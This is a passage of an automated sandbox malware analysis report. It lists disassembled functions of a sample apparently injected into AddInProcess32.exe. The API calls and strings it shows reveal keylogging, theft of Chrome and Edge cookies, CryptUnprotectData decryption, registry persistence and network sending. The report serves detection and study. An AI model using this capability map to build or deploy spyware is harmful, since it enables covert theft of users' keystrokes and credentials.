                                        • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                        • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                        Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                        • _free.LIBCMT ref: 0044F3BF
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                        • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                        • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                        • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                        Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                        • _free.LIBCMT ref: 004482D3
                                        • _free.LIBCMT ref: 004482FA
                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                        • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                        • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                        • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                        Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 004509D4
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 004509E6
                                        • _free.LIBCMT ref: 004509F8
                                        • _free.LIBCMT ref: 00450A0A
                                        • _free.LIBCMT ref: 00450A1C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                        • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                        • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                        Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00444066
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00444078
                                        • _free.LIBCMT ref: 0044408B
                                        • _free.LIBCMT ref: 0044409C
                                        • _free.LIBCMT ref: 004440AD
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                        • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                        • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                        Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strpbrk.LIBCMT ref: 0044E738
                                        • _free.LIBCMT ref: 0044E855
                                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                        • String ID: *?$.
                                        • API String ID: 2812119850-3972193922
                                        • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                        • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                        • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                        • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                        Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountEventTick
                                        • String ID: !D@$NG
                                        • API String ID: 180926312-2721294649
                                        • Opcode ID: 306b442fe718cca8e4508a21eba5f7addc44abaf7d19b424931de21f34a77e4f
                                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                        • Opcode Fuzzy Hash: 306b442fe718cca8e4508a21eba5f7addc44abaf7d19b424931de21f34a77e4f
                                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                        Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                        • String ID: XQG$NG$PG
                                        • API String ID: 1634807452-3565412412
                                        • Opcode ID: d72df948fdb7388eb2a1a73afc874b48c43343bf489fdfdac9cdb35a06fa3cf7
                                        • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                        • Opcode Fuzzy Hash: d72df948fdb7388eb2a1a73afc874b48c43343bf489fdfdac9cdb35a06fa3cf7
                                        • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                        Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: `#D$`#D
                                        • API String ID: 885266447-2450397995
                                        • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                        • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                        • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                        • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                        Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443475
                                        • _free.LIBCMT ref: 00443540
                                        • _free.LIBCMT ref: 0044354A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        • API String ID: 2506810119-760905667
                                        • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                        • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                        • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                        • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                        Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                        • String ID: /sort "Visit Time" /stext "$0NG
                                        • API String ID: 368326130-3219657780
                                        • Opcode ID: 1c9c4ba399293831d0fb5f486923e09a60e5b94a628d9fb6433429bc7bd7f276
                                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                        • Opcode Fuzzy Hash: 1c9c4ba399293831d0fb5f486923e09a60e5b94a628d9fb6433429bc7bd7f276
                                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                        Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 004162F5
                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                          • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcslen$CloseCreateValue
                                        • String ID: !D@$okmode$PG
                                        • API String ID: 3411444782-3370592832
                                        • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                        • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                        Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                        Strings
                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                        • API String ID: 1174141254-1980882731
                                        • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                        • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                        Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                        Strings
                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                        • API String ID: 1174141254-1980882731
                                        • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                        • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                        Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                        • wsprintfW.USER32 ref: 0040B1F3
                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventLocalTimewsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                        • API String ID: 1497725170-1359877963
                                        • Opcode ID: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
                                        • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                        • Opcode Fuzzy Hash: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
                                        • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                        Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTime$wsprintf
                                        • String ID: Online Keylogger Started
                                        • API String ID: 112202259-1258561607
                                        • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                        • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                        Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: CryptUnprotectData$crypt32
                                        • API String ID: 2574300362-2380590389
                                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                        Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandleObjectSingleWait
                                        • String ID: Connection Timeout
                                        • API String ID: 2055531096-499159329
                                        • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                        • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                        Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 2005118841-1866435925
                                        • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                        • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                        Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                        • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                        • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc
                                        • API String ID: 1818849710-4028850238
                                        • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                        • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                        Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                        • String ID: bad locale name
                                        • API String ID: 3628047217-1405518554
                                        • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                        • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                        • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                        • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                        Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                        • ShowWindow.USER32(00000009), ref: 00416C61
                                        • SetForegroundWindow.USER32 ref: 00416C6D
                                          • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                          • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                          • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                        Strings
                                        Memory Dump Source
